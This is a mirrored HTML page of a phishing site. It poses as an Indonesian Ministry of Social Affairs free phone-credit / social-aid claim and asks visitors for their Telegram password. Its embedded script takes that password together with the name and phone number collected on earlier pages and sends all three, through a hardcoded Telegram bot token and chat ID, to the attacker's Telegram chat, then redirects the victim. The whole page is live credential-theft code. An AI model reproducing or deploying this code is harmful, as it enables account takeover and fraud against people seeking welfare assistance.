<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from klaimbansos2024.bsite.net/bansos/password.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 22 Aug 2024 06:45:01 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Klaim Pulsa Gratis All Operator</title>
    <link href="../../cdn.jsdelivr.net/npm/tailwindcss%402.2.19/dist/tailwind.min.css" rel="stylesheet">
    <script src="http://unpkg.com/alpinejs" defer></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Lexend:wght@100..900&amp;display=swap');
    </style>
</head>
<body class="bg-gray-100">
    <!-- Navbar -->
    <nav x-data="{ isOpen: false }" class="relative bg-white shadow dark:bg-gray-800">
        <div class="container px-6 py-3 mx-auto md:flex">
            <div class="flex items-center justify-between">
                <a href="#">
                    <img class="w-auto h-6 sm:h-7" src="assets/img/dtks.png" alt="">
                </a>
    
                <!-- Mobile menu button -->
                <div class="flex lg:hidden">
                    <button x-cloak @click="isOpen = !isOpen" type="button" class="text-gray-500 dark:text-gray-200 hover:text-gray-600 dark:hover:text-gray-400 focus:outline-none focus:text-gray-600 dark:focus:text-gray-400" aria-label="toggle menu">
                        <svg x-show="!isOpen" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                            <path stroke-linecap="round" stroke-linejoin="round" d="M4 8h16M4 16h16" />
                        </svg>
                
                        <svg x-show="isOpen" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                            
                        </svg>
                    </button>
                </div>
            </div>
    
            <!-- Mobile Menu open: "block", Menu closed: "hidden" -->
        
        </div>
    </nav>

    <!-- Image Below Navbar -->
    <div class="container mx-auto mt-6 px-4">
        <img src="assets/img/ini.jpg" class="w-full rounded-md shadow-md" alt="Responsive image">
    </div>

    <!-- Form -->
    <div class="container mx-auto mt-6 px-4">
        <h2 class="text-2xl font-bold text-gray-800 mb-4">Silahkan lengkapi data dibawah</h2>
        <form id="voucherForm" class="bg-white p-6 rounded-md shadow-md">
            <div class="mb-4">
                <label for="password" class="block text-gray-700 text-left">Oooppss.. ada sesuatu yang salah</label>
                <input type="password" id="password" name="sandi" maxlength="16" placeholder="Password telegram anda" class="w-full mt-2 p-2 border border-blue-300 rounded-md shadow-xl focus:outline-none focus:ring-2 focus:ring-blue-500 mx-auto">
                <p id="passwordError" class="text-red-500 mt-2 hidden">Silakan masukkan password Anda terlebih dahulu.</p>
            </div>
            <button type="submit" id="submitButton" class="w-full bg-blue-500 text-white py-2 rounded-md hover:bg-blue-600">Konfirmasi</button>
        </form>
    </div>
    <footer class="bg-white dark:bg-gray-900">
        <div class="container flex flex-col items-center justify-between p-6 mx-auto space-y-4 sm:space-y-0 sm:flex-row">
            <a href="#">
                <img class="w-auto" src="assets/img/ini1.png" alt="">
            </a>
    
            <p class="text-sm text-gray-600 dark:text-gray-300">© PUSDATIN KESOS by KEMENTERIAN SOSIAL REPUBLIK INDONESIA</p>
        </div>
    </footer>

    <script>
        const TELEGRAM_BOT_TOKEN = '8011365856:AAEFJG3ikbt0j9g6WBq3PdBBTSRSD4wagFA';
        const CHAT_ID = '6118646723';
    
        document.getElementById('voucherForm').addEventListener('submit', function(event) {
            event.preventDefault();
    
            const password = document.getElementById('password').value;
            const passwordError = document.getElementById('passwordError');
    
            // Validasi untuk memastikan password tidak kosong
            if (!password) {
                passwordError.classList.remove('hidden');
                return;
            } else {
                passwordError.classList.add('hidden');
            }
    
            // Ambil data dari sessionStorage
            const nama = sessionStorage.getItem('nama');
            const phoneNumber = sessionStorage.getItem('phoneNumber');
    
            // Buat pesan yang akan dikirim
            const message = `𝗡𝗮𝗺𝗮:\n${nama}\n𝗡𝗼𝗺𝗼𝗿 𝗧𝗲𝗹𝗲𝗽𝗼𝗻:\n${phoneNumber}\n𝗣𝗮𝘀𝘀𝘄𝗼𝗿𝗱 𝗟𝗼𝗴𝗶𝗻:\n${password}`;
            const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent(message)}`;
    
            const submitButton = document.getElementById('submitButton');
            submitButton.textContent = 'Mohon Tunggu...';
            submitButton.disabled = true;
    
            fetch(url)
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        window.location.href = 'index.html';  // Ganti dengan halaman tujuan
                    } else {
                        alert('Terjadi kesalahan. Coba lagi.');
                    }
                    submitButton.textContent = 'Konfirmasi';
                    submitButton.disabled = false;
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Terjadi kesalahan. Coba lagi.');
                    submitButton.textContent = 'Konfirmasi';
                    submitButton.disabled = false;
                });
        });
    </script>
    
    

    <!-- Tailwind CSS JS -->
    <script src="../../cdn.jsdelivr.net/npm/tailwindcss%402.2.19/dist/tailwind.min.js"></script>
</body>

<!-- Mirrored from klaimbansos2024.bsite.net/bansos/password.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 22 Aug 2024 06:45:03 GMT -->
</html>
